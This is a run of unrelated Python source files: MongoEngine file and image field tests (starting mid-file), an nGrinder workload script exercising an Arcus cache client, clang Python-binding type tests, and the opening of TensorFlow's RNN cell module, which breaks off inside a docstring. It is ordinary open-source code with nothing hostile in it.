Animal.drop_collection() marmot = Animal(genus='Marmota', family='Sciuridae') marmot_photo = open(TEST_IMAGE_PATH, 'rb') # Retrieve a photo from disk marmot.photo.put(marmot_photo, content_type='image/jpeg', foo='bar') marmot.photo.close() marmot.save() marmot = Animal.objects.get() self.assertEqual(marmot.photo.content_type, 'image/jpeg') self.assertEqual(marmot.photo.foo, 'bar') def test_file_reassigning(self): class TestFile(Document): the_file = FileField() TestFile.drop_collection() test_file = TestFile(the_file=open(TEST_IMAGE_PATH, 'rb')).save() self.assertEqual(test_file.the_file.get().length, 8313) test_file = TestFile.objects.first() test_file.the_file = open(TEST_IMAGE2_PATH, 'rb') test_file.save() self.assertEqual(test_file.the_file.get().length, 4971) def test_file_boolean(self): """Ensure that a boolean test of a FileField indicates its presence """ class TestFile(Document): the_file = FileField() TestFile.drop_collection() test_file = TestFile() self.assertFalse(bool(test_file.the_file)) test_file.the_file.put(six.b('Hello, World!'), content_type='text/plain') test_file.save() self.assertTrue(bool(test_file.the_file)) test_file = TestFile.objects.first() self.assertEqual(test_file.the_file.content_type, "text/plain") def test_file_cmp(self): """Test comparing against other types""" class TestFile(Document): the_file = FileField() test_file = TestFile() self.assertFalse(test_file.the_file in [{"test": 1}]) def test_file_disk_space(self): """ Test disk space usage when we delete/replace a file """ class TestFile(Document): the_file = FileField() text = six.b('Hello, World!') content_type = 'text/plain' testfile = TestFile() testfile.the_file.put(text, content_type=content_type, filename="hello") testfile.save() # Now check fs.files and fs.chunks db = TestFile._get_db() files = db.fs.files.find() chunks = db.fs.chunks.find() self.assertEquals(len(list(files)), 1) self.assertEquals(len(list(chunks)), 1) # Deleting the docoument should delete the files testfile.delete() files = db.fs.files.find() chunks = db.fs.chunks.find() self.assertEquals(len(list(files)), 0) self.assertEquals(len(list(chunks)), 0) # Test case where we don't store a file in the first place testfile = TestFile() testfile.save() files = db.fs.files.find() chunks = db.fs.chunks.find() self.assertEquals(len(list(files)), 0) self.assertEquals(len(list(chunks)), 0) testfile.delete() files = db.fs.files.find() chunks = db.fs.chunks.find() self.assertEquals(len(list(files)), 0) self.assertEquals(len(list(chunks)), 0) # Test case where we overwrite the file testfile = TestFile() testfile.the_file.put(text, content_type=content_type, filename="hello") testfile.save() text = six.b('Bonjour, World!') testfile.the_file.replace(text, content_type=content_type, filename="hello") testfile.save() files = db.fs.files.find() chunks = db.fs.chunks.find() self.assertEquals(len(list(files)), 1) self.assertEquals(len(list(chunks)), 1) testfile.delete() files = db.fs.files.find() chunks = db.fs.chunks.find() self.assertEquals(len(list(files)), 0) self.assertEquals(len(list(chunks)), 0) def test_image_field(self): if not HAS_PIL: raise SkipTest('PIL not installed') class TestImage(Document): image = ImageField() TestImage.drop_collection() with tempfile.TemporaryFile() as f: f.write(six.b("Hello World!")) f.flush() t = TestImage() try: t.image.put(f) self.fail("Should have raised an invalidation error") except ValidationError as e: self.assertEqual("%s" % e, "Invalid image: cannot identify image file %s" % f) t = TestImage() t.image.put(open(TEST_IMAGE_PATH, 'rb')) t.save() t = TestImage.objects.first() self.assertEqual(t.image.format, 'PNG') w, h = t.image.size self.assertEqual(w, 371) self.assertEqual(h, 76) t.image.delete() def test_image_field_reassigning(self): if not HAS_PIL: raise SkipTest('PIL not installed') class TestFile(Document): the_file = ImageField() TestFile.drop_collection() test_file = TestFile(the_file=open(TEST_IMAGE_PATH, 'rb')).save() self.assertEqual(test_file.the_file.size, (371, 76)) test_file = TestFile.objects.first() test_file.the_file = open(TEST_IMAGE2_PATH, 'rb') test_file.save() self.assertEqual(test_file.the_file.size, (45, 101)) def test_image_field_resize(self): if not HAS_PIL: raise SkipTest('PIL not installed') class TestImage(Document): image = ImageField(size=(185, 37)) TestImage.drop_collection() t = TestImage() t.image.put(open(TEST_IMAGE_PATH, 'rb')) t.save() t = TestImage.objects.first() self.assertEqual(t.image.format, 'PNG') w, h = t.image.size self.assertEqual(w, 185) self.assertEqual(h, 37) t.image.delete() def test_image_field_resize_force(self): if not HAS_PIL: raise SkipTest('PIL not installed') class TestImage(Document): image = ImageField(size=(185, 37, True)) TestImage.drop_collection() t = TestImage() t.image.put(open(TEST_IMAGE_PATH, 'rb')) t.save() t = TestImage.objects.first() self.assertEqual(t.image.format, 'PNG') w, h = t.image.size self.assertEqual(w, 185) self.assertEqual(h, 37) t.image.delete() def test_image_field_thumbnail(self): if not HAS_PIL: raise SkipTest('PIL not installed') class TestImage(Document): image = ImageField(thumbnail_size=(92, 18)) TestImage.drop_collection() t = TestImage() t.image.put(open(TEST_IMAGE_PATH, 'rb')) t.save() t = TestImage.objects.first() self.assertEqual(t.image.thumbnail.format, 'PNG') self.assertEqual(t.image.thumbnail.width, 92) self.assertEqual(t.image.thumbnail.height, 18) t.image.delete() def test_file_multidb(self): register_connection('test_files', 'test_files') class TestFile(Document): name = StringField() the_file = FileField(db_alias="test_files", collection_name="macumba") TestFile.drop_collection() # delete old filesystem get_db("test_files").macumba.files.drop() get_db("test_files").macumba.chunks.drop() # First instance test_file = TestFile() test_file.name = "Hello, World!" test_file.the_file.put(six.b('Hello, World!'), name="hello.txt") test_file.save() data = get_db("test_files").macumba.files.find_one() self.assertEqual(data.get('name'), 'hello.txt') test_file = TestFile.objects.first() self.assertEqual(test_file.the_file.read(), six.b('Hello, World!')) test_file = TestFile.objects.first() test_file.the_file = six.b('HELLO, WORLD!') test_file.save() test_file = TestFile.objects.first() self.assertEqual(test_file.the_file.read(), six.b('HELLO, WORLD!')) def test_copyable(self): class PutFile(Document): the_file = FileField() PutFile.drop_collection() text = six.b('Hello, World!') content_type = 'text/plain' putfile = PutFile() putfile.the_file.put(text, content_type=content_type) putfile.save() class TestFile(Document): name = StringField() self.assertEqual(putfile, copy.copy(putfile)) self.assertEqual(putfile, copy.deepcopy(putfile)) def test_get_image_by_grid_id(self): if not HAS_PIL: raise SkipTest('PIL not installed') class TestImage(Document): image1 = ImageField() image2 = ImageField() TestImage.drop_collection() t = TestImage() t.image1.put(open(TEST_IMAGE_PATH, 'rb')) t.image2.put(open(TEST_IMAGE2_PATH, 'rb')) t.save() test = TestImage.objects.first() grid_id = test.image1.grid_id self.assertEqual(1, TestImage.objects(Q(image1=grid_id) or Q(image2=grid_id)).count()) def test_complex_field_filefield(self): """Ensure you can add meta data to file""" class Animal(Document): genus = StringField() family = StringField() photos = ListField(FileField()) Animal.drop_collection() marmot = Animal(genus='Marmota', family='Sciuridae') marmot_photo = open(TEST_IMAGE_PATH, 'rb') # Retrieve a photo from disk photos_field = marmot._fields['photos'].field new_proxy = photos_field.get_proxy_obj('photos', marmot) new_proxy.put(marmot_photo, content_type='image/jpeg', foo='bar') marmot_photo.close() marmot.photos.append(new_proxy) marmot.save() marmot = Animal.objects.get() self.assertEqual(marmot.photos[0].content_type, 'image/jpeg') self.assertEqual(marmot.photos[0].foo, 'bar') self.assertEqual(marmot.photos[0].get().length, 8313) if __name__ == '__main__': unittest.main()
# -*- coding: utf-8 -*- """ /* * Copyright 2012-2014 NAVER Corp. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ """ ################################################ # Arcus workload simuation script for nGrinder # ################################################ from net.grinder.script import Test from net.grinder.script.Grinder import grinder from net.grinder.plugin.http import HTTPRequest, HTTPPluginControl from net.spy.memcached import ArcusClient, ConnectionFactoryBuilder, FailureMode, AddrUtil from net.spy.memcached.ops import OperationException from net.spy.memcached.collection import CollectionAttributes, CollectionOverflowAction, Element, ElementValueType, CollectionAttributes, ElementFlagFilter, ElementFlagUpdate from org.apache.log4j import Logger, Level; from java.math import BigInteger from java.lang import Long, Thread, Object, String, System from java.util import ArrayList, HashMap, Random from java.util.concurrent import TimeUnit, TimeoutException, ExecutionException, Future import sys, random, string, time ###################################################### # GLOBAL SETTINGS ###################################################### # configurations for Arcus cloud arcus_cloud = "127.0.0.1:2181" service_codes = ["test"] service_code = random.choice(service_codes) USE_GLOBAL_CLIENT = False # False=per thread , True=process DEFAULT_CONNECTION_WAIT = 2 # init waiting DEFAULT_TIMEOUT = 3000 # Operation default TO DEFAULT_PREFIX = 'arcustest-' # create a global client if USE_GLOBAL_CLIENT: global_cfb = ConnectionFactoryBuilder() global_client = ArcusClient.createArcusClient(arcus_cloud, service_code, global_cfb) # wait for the client to be connected to Arcus cloud print 'Wait for global client to be connected to Arcus cloud (%d seconds)' % (DEFAULT_CONNECTION_WAIT) Thread.currentThread().sleep(DEFAULT_CONNECTION_WAIT * 1000) ###################################################### # WORKLOAD FUNCTIONS ###################################################### print 'creating workloads' KeyLen = 20 ExpireTime = 600 # seconds chunk_sizes = [96, 120, 152, 192, 240, 304, 384, 480, 600, 752, 944, 1184, 1480, 1856, 2320, 2904, 3632, 4544, 5680, 7104, 8880, 11104, 13880, 17352, 21696, 27120, 33904, 42384, 52984, 66232, 82792, 103496, 129376, 161720, 202152, 252696, 315872, 394840, 493552, 1048576] chunk_values = ["Not_a_slab_class"] for s in chunk_sizes: value = "".join([random.choice(string.lowercase) for i in range(int(s*2/3))]) chunk_values.append(value) #chunk_values.append('empty') dummystring = "1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijlmnopqrstuvwxyz" def generateData(length): ret = '' for loop in range(length): randomInt = random.randint(0, 60) tempchar = dummystring[randomInt] ret = ret + tempchar return ret workloads = [chunk_values[1], chunk_values[1], chunk_values[2], chunk_values[2], chunk_values[3]] ###################################################### # UTILITY FUNCTIONS ###################################################### def gen_key(name="unknown"): """ Generates a key with given name and postfix """ prefix = DEFAULT_PREFIX key = generateData(KeyLen); return "%s%s:%s" % (prefix, name, key) def gen_workload(is_collection): """ Generates a string workload with specific size. """ if is_collection: return random.choice(chunk_values[0:17]) else: return random.choice(chunk_values) ###################################################### # GRINDER TEST RUNNER ###################################################### class TestRunner: def __init__(self): """ Initialize tests """ Logger.getLogger("net.spy.memcached").setLevel(Level.DEBUG); self.clients = [] if USE_GLOBAL_CLIENT: # use global client self.client = global_client else: cfb = ConnectionFactoryBuilder() self.client = ArcusClient.createArcusClient(arcus_cloud, service_code, cfb) print 'Wait for per-thread client to be connected to Arcus cloud (%d seconds)' % DEFAULT_CONNECTION_WAIT Thread.currentThread().sleep(DEFAULT_CONNECTION_WAIT * 1000) self.flush_counter = 0 self.tests = [] # insert operations self.tests.append(Test(1, "KeyValue").wrap(self.KeyValue)) self.tests.append(Test(2, "Collection_Btree").wrap(self.Collection_Btree)) self.tests.append(Test(3, "Collection_Set").wrap(self.Collection_Set)) self.tests.append(Test(4, "Collection_List").wrap(self.Collection_List)) def __call__(self): """ Tests to run """ for test in self.tests: test(gen_key(test.__name__)) def arcusGet(self, future, name='unknown', timeout=DEFAULT_TIMEOUT, timeunit=TimeUnit.MILLISECONDS): try: return future.get(timeout, timeunit) except TimeoutException, e: print "TimeoutException(%s) : %s"%(name, str(e)) future.cancel(1) except ExecutionException, e: print "ExecutionException(%s) : %s"%(name, str(e)) try: Thread.sleep(100) except Exception, e: pass future.cancel(1) except Exception, e: print "Exception : " + str(e) future.cancel(1) return None ###################################################### # TEST CASES ###################################################### def KeyValue(self, key): """ get:set:delete:incr:decr = 3:1:0.01:0.1:0.0001 """ name = 'KeyValue' workloads = [chunk_values[24]] # Set for i in range(0, 1): future = self.client.set(key, ExpireTime, random.choice(workloads)) result = self.arcusGet(future, name=name) #print str(result) # Get for i in range(0, 5): future = self.client.asyncGet(key) result = self.arcusGet(future, name=name) # Delete if random.randint(0, 3) == 0: future = self.client.delete(key) result = self.arcusGet(future, name=name) # Incr if random.randint(0, 1) == 0: future = self.client.set(key + 'numeric', ExpireTime, '1') result = self.arcusGet(future, name=name) future = self.client.asyncIncr(key + 'numeric', 1) result = self.arcusGet(future, name=name) # Decr if random.randint(0, 1) == 0: future = self.client.set(key + 'numeric', ExpireTime, '1') result = self.arcusGet(future, name=name) future = self.client.asyncDecr(key + 'numeric', 1) result = self.arcusGet(future, name=name) def Collection_Btree(self, key): """ """ name = 'Collection_Btree' keyList = [] for i in range(4): # Create 5 key keyList.append(key + str(i)) bkeyBASE = "bkey_byteArry" eflag = String("EFLAG").getBytes() filter = ElementFlagFilter(ElementFlagFilter.CompOperands.Equal, String("EFLAG").getBytes()) attr = CollectionAttributes() attr.setExpireTime(ExpireTime) # BopInsert + byte_array bkey for j in range(4): # 5 Key for i in range(50): # Insert 50 bkey bk = bkeyBASE + str(j) + str(i) # Uniq bkey bkey = String(String.valueOf(bk)).getBytes() ####____#### future = self.client.asyncBopInsert(keyList[j], bkey, eflag, random.choice(workloads), attr) result = self.arcusGet(future, name=name) #print str(result) # Bop Bulk Insert (Piped Insert) elements = [] for i in range(50): bk = bkeyBASE + str(0) + str(i) + "bulk" elements.append(Element(String(str(bk)).getBytes(), workloads[0], eflag)) ####____#### future = self.client.asyncBopPipedInsertBulk(keyList[0], elements, CollectionAttributes()) result = self.arcusGet(future, name=name) #print str(result) # BopGet Range + filter for j in range(4): bk = bkeyBASE + str(j) + str(0) bk_to = bkeyBASE + str(j) + str(50) bkey = String(String.valueOf(bk)).getBytes() bkey_to = String(String.valueOf(bk_to)).getBytes() ####____#### future = self.client.asyncBopGet(keyList[j], bkey, bkey_to, filter, 0, random.randint(20, 50), False, False) result = self.arcusGet(future, name=name) #print str(result) # BopGetBulk // 20120319 Ad bk = bkeyBASE + str(0) + str(0) bk_to = bkeyBASE + str(4) + str(50) bkey = String(String.valueOf(bk)).getBytes() bkey_to = String(String.valueOf(bk_to)).getBytes() ####____#### future = self.client.asyncBopGetBulk(keyList, bkey, bkey_to, filter, 0, random.randint(20, 50)) result = self.arcusGet(future, name=name) #for entry in result.entrySet(): # print str(entry.getKey()) # if entry.getValue().getElements() is not None: # print "[" # for element in entry.getValue().getElements().entrySet(): # print "bkey=%s, value=%s" % (str(element.getKey()), str(element.getValue().getValue())) # print "]" # else: # print "[elements=%s, response=%s]" % (entry.getValue().getElements(), entry.getValue().getCollectionResponse().getMessage()) #print "" #print str(result) # BopEmpty Create future = self.client.asyncBopCreate(key, ElementValueType.STRING, CollectionAttributes()) result = self.arcusGet(future, name=name) #print str(result) # BopSMGet bk = bkeyBASE + str(0) + str(0) bk_to = bkeyBASE + str(4) + str(50) bkey = String(String.valueOf(bk)).getBytes() ####____#### bkey_to = String(String.valueOf(bk_to)).getBytes() ####____#### future = self.client.asyncBopSortMergeGet(keyList, bkey, bkey_to, filter, 0, random.randint(20, 50)) result = self.arcusGet(future, name=name) #print str(result) # BopUpdate (eflag bitOP + value) key = keyList[0] eflagOffset = 0 value = "ThisIsChangeValue" bitop = ElementFlagUpdate(eflagOffset, ElementFlagFilter.BitWiseOperands.AND, String("aflag").getBytes()) for i in range(2): # 3 element update bk = bkeyBASE + str(0) + str(i) bkey = String(String.valueOf(bk)).getBytes() ####____#### future = self.client.asyncBopUpdate(key, bkey, bitop, value) result = self.arcusGet(future, name=name) #print str(result) # SetAttr (change Expire Time) attr.setExpireTime(100) future = self.client.asyncSetAttr(key, attr) result = self.arcusGet(future, name=name) #print str(result) # BopDelete (eflag filter delete) for j in range(4): bk = bkeyBASE + str(j) + str(0) bk_to = bkeyBASE + str(j) + str(10) bkey = String(String.valueOf(bk)).getBytes() ####____#### bkey_to = String(String.valueOf(bk_to)).getBytes() ####____#### future = self.client.asyncBopDelete(keyList[j], bkey, bkey_to, filter, 0, False) result = self.arcusGet(future, name=name) #print str(result) def Collection_Set(self, key): """ """ name = 'Collection_Set' attr = CollectionAttributes() attr.setExpireTime(ExpireTime) keyList = [] for i in range(4): keyList.append(key + str(i)) # SopInsert for i in range(4): for j in range(19): set_value = workloads[i] + str(j) future = self.client.asyncSopInsert(keyList[i], set_value, attr) result = self.arcusGet(future, name=name) #print str(result) # SopInsert Bulk (Piped) elements = [] for i in range(50): elements.append(str(i) + "_" + workloads[0]) future = self.client.asyncSopPipedInsertBulk(key, elements, CollectionAttributes()) result = self.arcusGet(future, name=name) #print str(result) # SopEmpty Create future = self.client.asyncSopCreate(key, ElementValueType.STRING, CollectionAttributes()) result = self.arcusGet(future, name=name) #print str(result) # SopExist (Piped exist) for i in range(4): listValue = [] for j in range(9): # 10 value exsist listValue.append(workloads[i] + str(j)) future = self.client.asyncSopPipedExistBulk(keyList[i], listValue) result = self.arcusGet(future, name=name) #print str(result) # SetAttr (change Expire Time) attr.setExpireTime(100) future = self.client.asyncSetAttr(keyList[0], attr) result = self.arcusGet(future, name=name) #print str(result) # SopDelete for i in range(4): for j in range(4): # 5 element value delete delValue = workloads[i] + str(j) future = self.client.asyncSopDelete(keyList[i], delValue, True) result = self.arcusGet(future, name=name) #print str(result) def Collection_List(self, key): """ """ name = 'Collection_List' attr = CollectionAttributes() attr.setExpireTime(ExpireTime) keyList = [] index = -1 # Tail insert for i in range(4): keyList.append(key + str(i)) # LopInsert for i in range(4): for j in range(50): future = self.client.asyncLopInsert(keyList[i], index, random.choice(workloads), attr) result = self.arcusGet(future, name=name) #print str(result) # LopInsert Bulk (Piped) elements = [] for i in range(50): elements.append(str(i) + "_" + workloads[0]) future = self.client.asyncLopPipedInsertBulk(keyList[0], -1, elements, CollectionAttributes()) result = self.arcusGet(future, name=name) #print str(result) # LopGet for i in range(4): index = 0 index_to = index + random.randint(20, 50) future = self.client.asyncLopGet(keyList[i], index, index_to, False, False) result = self.arcusGet(future, name=name) #print str(result) # LopAttr attr.setExpireTime(100) future = self.client.asyncSetAttr(keyList[0], attr) result = self.arcusGet(future, name=name) #print str(result) # LopDelete index = 0 index_to = 19 for i in range(1): future = self.client.asyncLopDelete(keyList[i], index, index_to, True) result = self.arcusGet(future, name=name) #print str(result)
import gc from clang.cindex import CursorKind from clang.cindex import TranslationUnit from clang.cindex import TypeKind from nose.tools import raises from .util import get_cursor from .util import get_tu kInput = """\ typedef int I; struct teststruct { int a; I b; long c; unsigned long d; signed long e; const int f; int *g; int ***h; }; """ def test_a_struct(): tu = get_tu(kInput) teststruct = get_cursor(tu, 'teststruct') assert teststruct is not None, "Could not find teststruct." fields = list(teststruct.get_children()) assert all(x.kind == CursorKind.FIELD_DECL for x in fields) assert all(x.translation_unit is not None for x in fields) assert fields[0].spelling == 'a' assert not fields[0].type.is_const_qualified() assert fields[0].type.kind == TypeKind.INT assert fields[0].type.get_canonical().kind == TypeKind.INT assert fields[1].spelling == 'b' assert not fields[1].type.is_const_qualified() assert fields[1].type.kind == TypeKind.TYPEDEF assert fields[1].type.get_canonical().kind == TypeKind.INT assert fields[1].type.get_declaration().spelling == 'I' assert fields[2].spelling == 'c' assert not fields[2].type.is_const_qualified() assert fields[2].type.kind == TypeKind.LONG assert fields[2].type.get_canonical().kind == TypeKind.LONG assert fields[3].spelling == 'd' assert not fields[3].type.is_const_qualified() assert fields[3].type.kind == TypeKind.ULONG assert fields[3].type.get_canonical().kind == TypeKind.ULONG assert fields[4].spelling == 'e' assert not fields[4].type.is_const_qualified() assert fields[4].type.kind == TypeKind.LONG assert fields[4].type.get_canonical().kind == TypeKind.LONG assert fields[5].spelling == 'f' assert fields[5].type.is_const_qualified() assert fields[5].type.kind == TypeKind.INT assert fields[5].type.get_canonical().kind == TypeKind.INT assert fields[6].spelling == 'g' assert not fields[6].type.is_const_qualified() assert fields[6].type.kind == TypeKind.POINTER assert fields[6].type.get_pointee().kind == TypeKind.INT assert fields[7].spelling == 'h' assert not fields[7].type.is_const_qualified() assert fields[7].type.kind == TypeKind.POINTER assert fields[7].type.get_pointee().kind == TypeKind.POINTER assert fields[7].type.get_pointee().get_pointee().kind == TypeKind.POINTER assert fields[7].type.get_pointee().get_pointee().get_pointee().kind == TypeKind.INT def test_references(): """Ensure that a Type maintains a reference to a TranslationUnit.""" tu = get_tu('int x;') children = list(tu.cursor.get_children()) assert len(children) > 0 cursor = children[0] t = cursor.type assert isinstance(t.translation_unit, TranslationUnit) # Delete main TranslationUnit reference and force a GC. del tu gc.collect() assert isinstance(t.translation_unit, TranslationUnit) # If the TU was destroyed, this should cause a segfault. decl = t.get_declaration() constarrayInput=""" struct teststruct { void *A[2]; }; """ def testConstantArray(): tu = get_tu(constarrayInput) teststruct = get_cursor(tu, 'teststruct') assert teststruct is not None, "Didn't find teststruct??" fields = list(teststruct.get_children()) assert fields[0].spelling == 'A' assert fields[0].type.kind == TypeKind.CONSTANTARRAY assert fields[0].type.get_array_element_type() is not None assert fields[0].type.get_array_element_type().kind == TypeKind.POINTER assert fields[0].type.get_array_size() == 2 def test_equal(): """Ensure equivalence operators work on Type.""" source = 'int a; int b; void *v;' tu = get_tu(source) a = get_cursor(tu, 'a') b = get_cursor(tu, 'b') v = get_cursor(tu, 'v') assert a is not None assert b is not None assert v is not None assert a.type == b.type assert a.type != v.type assert a.type != None assert a.type != 'foo' def test_type_spelling(): """Ensure Type.spelling works.""" tu = get_tu('int c[5]; int i[]; int x; int v[x];') c = get_cursor(tu, 'c') i = get_cursor(tu, 'i') x = get_cursor(tu, 'x') v = get_cursor(tu, 'v') assert c is not None assert i is not None assert x is not None assert v is not None assert c.type.spelling == "int [5]" assert i.type.spelling == "int []" assert x.type.spelling == "int" assert v.type.spelling == "int [x]" def test_typekind_spelling(): """Ensure TypeKind.spelling works.""" tu = get_tu('int a;') a = get_cursor(tu, 'a') assert a is not None assert a.type.kind.spelling == 'Int' def test_function_argument_types(): """Ensure that Type.argument_types() works as expected.""" tu = get_tu('void f(int, int);') f = get_cursor(tu, 'f') assert f is not None args = f.type.argument_types() assert args is not None assert len(args) == 2 t0 = args[0] assert t0 is not None assert t0.kind == TypeKind.INT t1 = args[1] assert t1 is not None assert t1.kind == TypeKind.INT args2 = list(args) assert len(args2) == 2 assert t0 == args2[0] assert t1 == args2[1] @raises(TypeError) def test_argument_types_string_key(): """Ensure that non-int keys raise a TypeError.""" tu = get_tu('void f(int, int);') f = get_cursor(tu, 'f') assert f is not None args = f.type.argument_types() assert len(args) == 2 args['foo'] @raises(IndexError) def test_argument_types_negative_index(): """Ensure that negative indexes on argument_types Raises an IndexError.""" tu = get_tu('void f(int, int);') f = get_cursor(tu, 'f') args = f.type.argument_types() args[-1] @raises(IndexError) def test_argument_types_overflow_index(): """Ensure that indexes beyond the length of Type.argument_types() raise.""" tu = get_tu('void f(int, int);') f = get_cursor(tu, 'f') args = f.type.argument_types() args[2] @raises(Exception) def test_argument_types_invalid_type(): """Ensure that obtaining argument_types on a Type without them raises.""" tu = get_tu('int i;') i = get_cursor(tu, 'i') assert i is not None i.type.argument_types() def test_is_pod(): """Ensure Type.is_pod() works.""" tu = get_tu('int i; void f();') i = get_cursor(tu, 'i') f = get_cursor(tu, 'f') assert i is not None assert f is not None assert i.type.is_pod() assert not f.type.is_pod() def test_function_variadic(): """Ensure Type.is_function_variadic works.""" source =""" #include <stdarg.h> void foo(int a, ...); void bar(int a, int b); """ tu = get_tu(source) foo = get_cursor(tu, 'foo') bar = get_cursor(tu, 'bar') assert foo is not None assert bar is not None assert isinstance(foo.type.is_function_variadic(), bool) assert foo.type.is_function_variadic() assert not bar.type.is_function_variadic() def test_element_type(): """Ensure Type.element_type works.""" tu = get_tu('int c[5]; int i[]; int x; int v[x];') c = get_cursor(tu, 'c') i = get_cursor(tu, 'i') v = get_cursor(tu, 'v') assert c is not None assert i is not None assert v is not None assert c.type.kind == TypeKind.CONSTANTARRAY assert c.type.element_type.kind == TypeKind.INT assert i.type.kind == TypeKind.INCOMPLETEARRAY assert i.type.element_type.kind == TypeKind.INT assert v.type.kind == TypeKind.VARIABLEARRAY assert v.type.element_type.kind == TypeKind.INT @raises(Exception) def test_invalid_element_type(): """Ensure Type.element_type raises if type doesn't have elements.""" tu = get_tu('int i;') i = get_cursor(tu, 'i') assert i is not None i.element_type def test_element_count(): """Ensure Type.element_count works.""" tu = get_tu('int i[5]; int j;') i = get_cursor(tu, 'i') j = get_cursor(tu, 'j') assert i is not None assert j is not None assert i.type.element_count == 5 try: j.type.element_count assert False except: assert True def test_is_volatile_qualified(): """Ensure Type.is_volatile_qualified works.""" tu = get_tu('volatile int i = 4; int j = 2;') i = get_cursor(tu, 'i') j = get_cursor(tu, 'j') assert i is not None assert j is not None assert isinstance(i.type.is_volatile_qualified(), bool) assert i.type.is_volatile_qualified() assert not j.type.is_volatile_qualified() def test_is_restrict_qualified(): """Ensure Type.is_restrict_qualified works.""" tu = get_tu('struct s { void * restrict i; void * j; };') i = get_cursor(tu, 'i') j = get_cursor(tu, 'j') assert i is not None assert j is not None assert isinstance(i.type.is_restrict_qualified(), bool) assert i.type.is_restrict_qualified() assert not j.type.is_restrict_qualified() def test_record_layout(): """Ensure Cursor.type.get_size, Cursor.type.get_align and Cursor.type.get_offset works.""" source =""" struct a { long a1; long a2:3; long a3:4; long long a4; }; """ tries=[(['-target','i386-linux-gnu'],(4,16,0,32,35,64)), (['-target','nvptx64-unknown-unknown'],(8,24,0,64,67,128)), (['-target','i386-pc-win32'],(8,16,0,32,35,64)), (['-target','msp430-none-none'],(2,14,0,32,35,48))] for flags, values in tries: align,total,a1,a2,a3,a4 = values tu = get_tu(source, flags=flags) teststruct = get_cursor(tu, 'a') fields = list(teststruct.get_children()) assert teststruct.type.get_align() == align assert teststruct.type.get_size() == total assert teststruct.type.get_offset(fields[0].spelling) == a1 assert teststruct.type.get_offset(fields[1].spelling) == a2 assert teststruct.type.get_offset(fields[2].spelling) == a3 assert teststruct.type.get_offset(fields[3].spelling) == a4 assert fields[0].is_bitfield() == False assert fields[1].is_bitfield() == True assert fields[1].get_bitfield_width() == 3 assert fields[2].is_bitfield() == True assert fields[2].get_bitfield_width() == 4 assert fields[3].is_bitfield() == False def test_offset(): """Ensure Cursor.get_record_field_offset works in anonymous records""" source=""" struct Test { struct { int bariton; union { int foo; }; }; int bar; };""" tries=[(['-target','i386-linux-gnu'],(4,16,0,32,64)), (['-target','nvptx64-unknown-unknown'],(8,24,0,32,64)), (['-target','i386-pc-win32'],(8,16,0,32,64)), (['-target','msp430-none-none'],(2,14,0,32,64))] for flags, values in tries: align,total,bariton,foo,bar = values tu = get_tu(source) teststruct = get_cursor(tu, 'Test') fields = list(teststruct.get_children()) assert teststruct.type.get_offset("bariton") == bariton assert teststruct.type.get_offset("foo") == foo assert teststruct.type.get_offset("bar") == bar def test_decay(): """Ensure decayed types are handled as the original type""" tu = get_tu("void foo(int a[]);") foo = get_cursor(tu, 'foo') a = foo.type.argument_types()[0] assert a.kind == TypeKind.INCOMPLETEARRAY assert a.element_type.kind == TypeKind.INT assert a.get_canonical().kind == TypeKind.INCOMPLETEARRAY
# Copyright 2015 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Module for constructing RNN Cells. ## Base interface for all RNN Cells @@RNNCell ## RNN Cells for use with TensorFlow's core RNN methods @@BasicRNNCell @@BasicLSTMCell @@GRUCell @@LSTMCell ## Classes storing split `RNNCell` state @@LSTMStateTuple ## RNN Cell wrappers (RNNCells that wrap other RNNCells) @@MultiRNNCell @@DropoutWrapper @@EmbeddingWrapper @@InputProjectionWrapper @@OutputProjectionWrapper """ from __future__ import absolute_import from __future__ import division from __future__ import print_function import collections import math from tensorflow.python.framework import ops from tensorflow.python.framework import tensor_shape from tensorflow.python.ops import array_ops from tensorflow.python.ops import clip_ops from tensorflow.python.ops import embedding_ops from tensorflow.python.ops import init_ops from tensorflow.python.ops import math_ops from tensorflow.python.ops import nn_ops from tensorflow.python.ops import partitioned_variables from tensorflow.python.ops import variable_scope as vs from tensorflow.python.ops.math_ops import sigmoid from tensorflow.python.ops.math_ops import tanh from tensorflow.python.platform import tf_logging as logging from tensorflow.python.util import nest def _state_size_with_prefix(state_size, prefix=None): """Helper function that enables int or TensorShape shape specification. This function takes a size specification, which can be an integer or a TensorShape, and converts it into a list of integers. One may specify any additional dimensions that precede the final state size specification. Args: state_size: TensorShape or int that specifies the size of a tensor. prefix: optional additional list of dimensions to prepend. Returns: result_state_size: list of dimensions the resulting tensor size. """ result_state_size = tensor_shape.as_shape(state_size).as_list() if prefix is not None: if not isinstance(prefix, list): raise TypeError("prefix of _state_size_with_prefix should be a list.") result_state_size = prefix + result_state_size return result_state_size class RNNCell(object): """Abstract object representing an RNN cell. The definition of cell in this package differs from the definition used in the literature. In the literature, cell refers to an object with a single scalar output. The definition in this package refers to a horizontal array of such units. An RNN cell, in the most abstract setting, is anything that has a state and performs some operation that takes a matrix of inputs. This operation results in an output matrix with `self.output_size` columns. If `self.state_size` is an integer, this operation also results in a new state matrix with `self.state_size` columns. If `self.state_size` is a tuple of integers, then it results in a tuple of `len(state_size)` state matrices, each with a column size corresponding to values in `state_size`. This module provides a number of basic commonly used RNN cells, such as LSTM (Long Short Term Memory) or GRU (Gated Recurrent Unit), and a number of operators that allow add dropouts, projections, or embeddings for inputs. Constructing multi-layer cells is supported by the class `MultiRNNCell`, or by calling the `rnn` ops several times. Every `RNNCell` must have the properties below and and implement `__call__` with the following signature. """ def __call__(self, inputs, state, scope=None): """Run this RNN cell on inputs, starting from the given state. Args: inputs: `2-D` tensor with shape `[batch_size x input_size]`. state: if `self.state_size` is an integer, this should be a `2-D Tensor` with shape `[batch_size x self.state_size]`. Otherwise, if `self.state_size` is a 